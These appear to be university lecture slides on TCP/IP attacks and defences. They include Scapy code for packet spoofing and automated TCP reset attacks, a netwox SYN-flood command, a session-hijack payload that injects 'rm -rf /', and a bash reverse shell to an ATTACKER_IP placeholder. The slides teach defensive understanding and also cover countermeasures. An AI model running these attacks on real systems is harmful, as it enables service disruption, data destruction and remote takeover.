Network Security�TCP/IP Vulnerabilities

Instructor: Mohamed Hefeeda

Some of these slides were created by Dr. Khaled Diab of SFU, used by permission.

CMPT 471: Networking II

Security Goals

• Common general security goals (CIAA):
• Confidentiality
• Integrity
• Authenticity
• Availability

2

Confidentiality (Privacy)

3

Eavesdropping, packet sniffing

• Confidentiality is concealment of information.

Integrity

4

1. Intercept messages
2. tamper
3. release again

• Integrity is prevention of unauthorized changes.

Authenticity

5

Unauthorized assumption of another’s identity

• Authenticity is knowing who you are talking to.

Authenticity

6

Availability

7

Overwhelm or crash servers, disrupt infrastructure

• Availability is ability to use information or resources.

Observation

• Many systems are designed without really consideration security
• Just get the systems up and running

​

• Security is usually left as “out-of-band” or “thought after” 🡺 security problems and breaches

​

8

Sources of Vulnerabilities in Networks

• Protocol-level vulnerabilities
• Implicit trust assumptions in design

​

• Implementation vulnerabilities
• Both on routers and end-hosts

​

• Incomplete specifications
• Often left to the programmers

​

9

Security Topics

• Packet Sniffing, Filtering, and Spoofing
• TCP/IP Attacks
• TCP SYN flooding
• TCP Reset
• TCP Session Hijacking
• Source Routing

​

• Firewalls and VPNs (time permits)

​

10

Packet Sniffing and Spoofing

CMPT 471: Networking II

Sniffing and Spoofing Packets

• Sniff = capture packets not yours
• Spoof = create and send fake packets

​

​

• Both are essential for attackers and analysts

​

12

Packet Sniffing

• Capture packets on the network

​

• Useful for:
• Intrusion Analyst: dissect network traffic to study intrusions
• Forensic Investigator: check the extent of a malware infection
• Attackers: understand their victim networks!

​

​

​

13

Network

Sniffer Machine

• The sniffer wants to receives packets that were not destined to itself

​

​

• But, the default behavior of a NIC is to discard these packets!
• To reduce CPU processing

​

• How can we sniff then?
• Change the default!

​

14

NIC: Promiscuous Mode

• Recent NICs support “promiscuous” mode
• Allows NIC to receive traffic not destined for the host
• NIC then passes sniffed packets to CPU for further processing

​

• Check an interface (on Linux):

15

$ ip address

1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1

...

2: enp0s3: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000

​

loopback intf

NIC intf

NIC: Promiscuous Mode

• Enable promiscuous mode:

16

$ sudo ip link set enp0s3 promisc on

​

$ ip address

1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1

...

2: enp0s3: <BROADCAST,MULTICAST,PROMISC,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000

• Check again:

PROMISC enabled

How can we implement packet sniffers?

• Implement code using Raw Sockets
• Low level handling of packets
• OS kernel passes packets directly to apps that utilize raw sockets
• Efficient, but not portable across different OSes
• Implement code using pcap library or similar
• Portable across different OSes
• Linux: libpcap. Windows: WinPcap
• Easier but still somewhat low level (writing C code)
• Use tools such as
• Wireshark
• Scapy (Python module)
• Captures and sends packets, plus many other functions

​

​

​

​

17

Packet Capturing Using Raw Sockets

18

// create a raw socket

int sock = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ALL));

​

// turn on promiscuous mode

mr.mr_type = PACKET_MR_PROMISC;

setsockopt(sock, SOL_PACKET, PACKET_ADD_MEMBERSHIP, &mr, sizeof(mr));

​

// capture packets

while(1) {

int data_size = recvfrom(sock, buffer, PACKET_LEN, 0, &saddr, � (socklen_t *) sizeof(saddr));

​

if (data_size)

printf (“Received a packet \n”);

}

​

​

Capture all types of packets

Packet Capturing Using pcap Library

19

// open pacp session on a NIC (with name eth3 in this case)

handle = pcap_open_live(“eth3”, BUFSIZ, 1, 1000, errbuf);

​

// define a filter expression

char filter_exp[] = “ip proto icmp”;

​

// compile filter_exp into BPF pseudo-code

pcap_compile(handle, &fp, filter_exp, 0, net);

pcap_setfilter(handle, &fp);

​

// capture packets

pcap_loop(handle, -1, got_packet, NULL);

​

​

promiscuous mode

// function to process captured packets

void got_packet(u_char *args, const struct pcap_pkthdr *header, � const u_char *packet) {

printf(“Got packet \n”);

}

Compile:

$ gcc –o sniff sniff.c -lpcap

Packing Capturing Using Scapy

• Scapy: Python module for sending, sniffing, and forging packets
• Easy and powerful, many uses

​

​

​

Creating and sending packets in Scapy

$ sudo python3

​

from scapy.all import *

​

ip = IP(dst="google.com") # Create IP header, and initialize its dst address

​

icmp = ICMP() # Create ICMP header, with default values

​

pkt = ip/icmp # Stack ICMP on top of IP

​

pkt.show() # show pkt contents

​

ans = sr1(pkt) # send 1 pkt and receive response

​

ans.show() #print summary

Scapy demo: Try the following (on P4 VM)

sudo python3 

from scapy.all import *

�#let us ping google.com: IP: 142.250.69.206

ip = IP(dst=”google.com”)

icmp = ICMP()

pkt = ip/icmp

#send 1 packet and wait for response 

ans = sr1(pkt)

ans.show()�

#let us change some fields in the packet itself 

pkt[IP].dst = “www.cnn.com”

pkt.show()

�

22

#list all functions 

lsc()

#help on a specific function 

help(sr) 

​

#SYN Scan: see whether TCP port 80 or 90 is open (accepts SYN)

ans, unans = sr(IP(dst="google.com")/TCP(dport=[80,90], flags="S"), retry=-2, timeout=1)

​

ans.summary()

unans.summary()

�

Packing Capturing Using Scapy

$ sudo python3

​

>>> from scapy.all import *

>>> ans = sniff(filter="icmp", count=2)

>>> ans.show()

# from another terminal ping the machine running sniff

​

Packing Capturing Using Scapy: more control

#!/usr/bin/python3

​

from scapy.all import *

​

print(”Sniffing packets .....")

​

def process_pkt(pkt):

print (“Received a packet:”)

print (“Source IP: ”, pk[IP].src)

print (“Destination IP: ”, pk[IP].dst)

print (“Protocol: ”, pk[IP].proto)

print (“\n”)

​

pkt = sniff(filter=‘icmp’, prn=process_pkt)

​

​

# Put the code in sniff.py

$ chmod a+x sniff.py

$ sudo ./sniff.py

​

# from another terminal ping the machine running sniff.py

​

Packet Filtering

• Capturing ALL packets imposes too much overheads

​

• 🡺 Capture only packets of interest using packet filters

​

• Berkeley Packet Filter (BPF) is the most commonly used syntax

​

25

udp port 53

Expression =

How are packet filters implemented?

Slide source: Du, Computer & Internet Security, 2019

BSD Packet Filter (BPF)

• A compiled BPF pseudo-code can be attached to a socket through setsockopt()
• When a packet is received by kernel, BPF will be applied
• If a packet accepted, it will be pushed up the protocol stack

setsockopt(sock, SOL_SOCKET, SO_ATTACH_FILTER, &bpf, sizeof(bpf))

BPF Syntax

udp port 53 && dst host 192.0.2.2

28

Expression =

BPF Syntax

• Three kinds of qualifiers:
• type: host, net, port, portrange
• dir: src, dst
• proto: ether, arp, ip, ip6, icmp, tcp, udp

29

ip src host 10.0.0.1

tcp port 80

ip host 10.0.0.1

Either src or dst

BPF Syntax

• Match specific fields in the packet:
• icmp[0] == 8

30

0 : Echo Reply

8 : Echo Request

11: Time Exceeded

BPF Syntax

• Match specific fields in the packet:
• ip[8] > 64 (check whether TTL > 64)

​

31

BPF Syntax

• Match specific fields in the packet:
• tcp[14:2] == 0

32

Packet Spoofing

• Many network attacks rely on packet spoofing
• Spoofing means changing important information in the packet, e.g., src IP
• Similar to sniffing, packet spoofing can be implemented using
• Raw sockets
• pcap library
• Tools, e.g., Scapy

​

Spoofing ICMP Packet using Scapy

from scapy.all import *

​

print("Sending Spoofed ICMP packet .....")

ip = IP(src="1.2.3.4", dst="10.0.2.15")

icmp = ICMP()

pkt = ip/icmp

pkt.show()

send(pkt)

Spoofing UDP Packet using Scapy

from scapy.all import *

​

print("Sending Spoofed UDP packet .....")

ip = IP(src="1.2.3.4", dst="10.0.2.15") #IP header

udp = UDP(sport=8888, dport=9090) # UDP header

payload = "Hello UDP!\n” # Payload

pkt = ip/udp/payload # whole packet

pkt.show()

send(pkt)

Sniffing AND Spoofing using Scapy

from scapy.all import *

​

def spoof_pkt(pkt):

ip = IP(src="1.2.3.4", dst=pkt[IP].src)

icmp = ICMP()

newdpkt = ip/icmp

send(pkt)

​

​

pkt = sniff(filter=‘src host 1.0.0.1’, prn=spoof_pkt)

​

Exercise: change sniff.py to capture ICMP packets and send reply with a spoofed source address of cnn.com

SYN Flooding

37

Recall: TCP Connection Establishment

• Any TCP connection starts with a three-way handshake.

​

38

• Transmission Control Block (TCB) is stored at the server.
• The server stores the TCB in a queue that is only for the half-open connections

TCP SYN Flooding

• A denial-of-service attack
• The TCP server stores all the half-open connections in a queue
• Before the three-way handshake is done
• Recall: the queue has a limited capacity
• What happens when the queue is full?
• The attacker attempts to fill up the TCB queue quickly
• No more space for new TCP connections
• The server will reject new SYN packets
• The CPU may have not reached its capacity!

​

39

TCP SYN Flooding

• The attacker needs to perform two steps:
• Send a lot of SYN packets to the server (i.e., flooding)
• Do not finish the third step of the three-way handshake protocol

​

• How does the attacker set the source IP address?
• Use random source IP addresses
• Why?
• SYN-ACK packets (to the random source) may be:
• Dropped in transit
• Received by a real machine, and dropped there

​

​

40

Launching the Attack

41

Client

10.0.2.4

10.0.2.5

10.0.2.7

Attacker

Server

Launching the Attack

• Flooding the server with SYN:
• Option 1: using tools.

​

42

$ sudo netwox 76 -i 10.0.2.4 -p 23 -s raw

• Option 2: generating SYN pkts from code

​

Launching the Attack

• Does adding more CPU resources help with SYN Flooding attack?
• Not, it would not.
• Here is CPU utilization of a machine under attack

43

Countermeasure

• Allocate resources only when the server has received the final ACK packet

​

• Problem?
• Attackers can do ACK flooding (send fake ACKs)
• Harmful than SYN flooding (more resources allocated)

​

• The server needs to know if the received ACK is legitimate!

44

Countermeasure

• Key Idea: randomize the initial sequence number
• Calculate a hashed value H that only the server knows
• Inject this value as the initial sequence number in the SYN+ACK pkt
• If server does not receive the expected sequence number in ACK pkt, It will not process this ACK pkt

​

• Only the server knows how to calculate H
• This is called SYN Cookie and enabled as follows:

45

$ sudo sysctl -w net.ipv4.tcp_syncookies=1

TCP Reset

46

TCP Reset Attack

• Attack: close an on-going connection between two victim hosts

​

• Relies on how TCP closes connections

Closing TCP Connections: FIN Protocol

48

Now A🡪B is closed

A

B

Now B🡪A is closed

Gracefully closing a TCP connection using FIN flag

Closing TCP Connections: RST

49

A

B

Closing TCP connection due to error by sending an RST segment (RST flag set)

TCP Reset Attack

• Which mechanism is used for the TCP Reset attack? Why?
• Sending a spoofed RST packet

50

Attacker

Spoofed RST

Src IP

Dst IP

Src Port

Dst Port

Sequence Number

The attacker needs to sniff the network to send a spoofed RST pkt. Why?

To know the seq number, and other header fields

TCP Apps Vulnerable to RST attacks

• Telnet
• SSH
• But SSH uses encryption, right? How can we mount the RST attack then?
• The payload is encrypted, but IP and TCP headers aren’t
• 🡺 TCP RST attack can be mounted on SSH connections

​

• Can you think of other applications that are vulnerable to RST attacks?
• Basically, wherever TCP is used and the headers are not encrypted!
• But sometimes it takes extra efforts, let us see a complex example

51

Video Streaming Server

52

Video

Server

Most modern streaming services use HTTP (i.e., TCP in the transport layer)

TCP Reset Attack in Video Streaming

• Challenges:
• Choose which endpoint to reset 🡪 server or client
• Either to attack client, as server may detect unexpected RST packets
• Packets arrive continuously
• manual sniffing is impossible

​

• Instead, we need to automate the RST attack.

53

TCP Reset Attack in Video Streaming

• Strategy:
• Sniff TCP packets generated from the client (how?)
• Calculate the sequence number (how?)
• Send a spoofed RST pkt to the client

​

54

VICTIM_IP = “10.1.0.4”

def tcp_rst(pkt):

ip = IP(dst=VICTIM_IP, src=pkt[IP].dst)

tcp = TCP(flags=“R”,

sport=pkt[TCP].dport,

dport=pkt[TCP].sport,

seq=?)

rst_pkt = ip/tcp

send(rst_pkt)

​

pkt = sniff(filter=“tcp and src host %s” %

VICTIM_IP, prn= tcp_rst)

run tcp_rst on each pkt that matches the filter

TCP Reset Attack in Video Streaming

• Strategy:
• Sniff TCP packets generated from the client (how?)
• Calculate the sequence number (how?)
• Send a spoofed RST pkt to the client

​

55

VICTIM_IP = “10.1.0.4”

def tcp_rst(pkt):

ip = IP(dst=VICTIM_IP, src=pkt[IP].dst)

tcp = TCP(flags=“R”,

sport=pkt[TCP].dport,

dport=pkt[TCP].sport,

seq=pkt[TCP].ack)

rst_pkt = ip/tcp

send(rst_pkt)

​

pkt = sniff(filter=“tcp and src host %s” %

VICTIM_IP, tcp_rst)

Recall: ACK num indicates the next expected byte from sender 🡺 thus we put it in the seq num

​

Countermeasures

• IPSec: RFC 4301 and RFC 4309
• IP layer security
• Has two modes:
• Tunnel (Encrypt and encapsulate the IP pkt with a new IP header)
• Transport (Encrypt IP payload only)
• Not widely deployed for end users
• TLS (Transport Layer Security): RFC 8446
• Widely used
• Sender and receiver first authenticate each other, and then agree on encryption keys and methods.
• Encrypts all header fields, no information leakage

56

TCP Session Hijacking

57

Recall: Data Transmission in TCP

58

1

2

3

Sending Order

Uses seq. number to reorder pkts

TCP Session Hijacking

• TCP Hijacking:
• The attacker injects arbitrary data in the TCP receiver buffer during ongoing TCP session

59

Attacker

TCP Session Hijacking: Principle

• Injected packets need to have the same:
• Source IP
• Destination IP
• Source port
• Destination port
• So the server believes they belong to the original session

​

• What else?!

60

TCP Session Hijacking: Principle

• How should the attacker set sequence number?

61

Received bytes

• Small N:
• The client may have already sent those bytes
• The server drops injected pkts because it believes they’re duplicates

​

• Large N:
• The buffer may not have enough space, or/and
• The attacker needs to wait till those N bytes are received

Hijacking a Telnet Session

• How does telnet work?

62

2. The telnet client sends them to the server

4. The telnet server executes the command 🡺

Hello 471!

Hello 471!

5. TCP receives output

6. The telnet client displays output

Hijacking a Telnet Session

• How does the attack work?

63

The telnet server executes user commands

The telnet server executes

user cmds

Delete everything!

Hijacking a Telnet Session

• Similar to Reset attack: Sniff and Spoof

64

ip = IP(src=“10.0.2.68”, dst=“10.0.2.69”)

tcp = TCP(sport= 46716, dport=23, flags=“A”,

seq=XXX,

ack=XXX)

cmd = “\r rm –rf /”

pkt = ip/tcp/cmd

send(pkt)

Command runs with user privileges

Session Hijacking can deadlock server & client

65

Attacker

Server

Client

4

5

Steps 2—7 repeat, and a deadlock happens

What else can attacker do with session hijacking?

/bin/bash -i > /dev/tcp/<ATTACKER_IP>/9090 0<&1 2>&1

66

Run a reverse shell (where attacker can issue commands)!

$ nc -lv 9090

Listening on [0.0.0.0] (family 0, port 9090)

On the attacker machine:

nc: netcat �-lv: listen on port 9090 in verbose mode

IP Routing Attacks

67

Network Layer: IP

68

routing: determines source-destination route taken by packets

• routing algorithms

forwarding: move packets from router’s input to appropriate router output

IP Options: Source Routing

• The source determines the routers along the path
• By stacking router addresses in the IP header.

69

Source Routing Attack

• Impersonate another host by creating source-routed traffic
• Attacker receives the response instead of the source
• Also, source routing can be used to know topology or send traffic through longs paths (causing extra load and congestion)

70

Attacker does not send reply to A

Attacker pretends pkt coming from

A going to B through itself

Countermeasure

• Most routers disable IP source routing by default

71

Summary

• Security goals:
• Confidentiality, Integrity, Authenticity, Availability
• Packet sniffing, filtering, and spoofing
• Essential to understand, analyze, and mount attacks
• TCP SYN and RST attacks and countermeasures
• Need good knowledge of how TCP works, e.g., seq #, FIN, RST, etc.
• TCP session Hijacking
• Can be severe, affects different applications (e.g., video streaming)
• IP source routing attacks and countermeasure using IPSec
• Other network layer attacks exist

​

72

Tools and References:

• Tools and libraries
• Scapy
• libpcap
• tcpdump
• nmap
• Wireshark
• tshark
• References:
• Info on packet filers: https://wiki.wireshark.org/CaptureFilters
• Du, Computer and Internet Security: A Hands-on Approach, 2019

73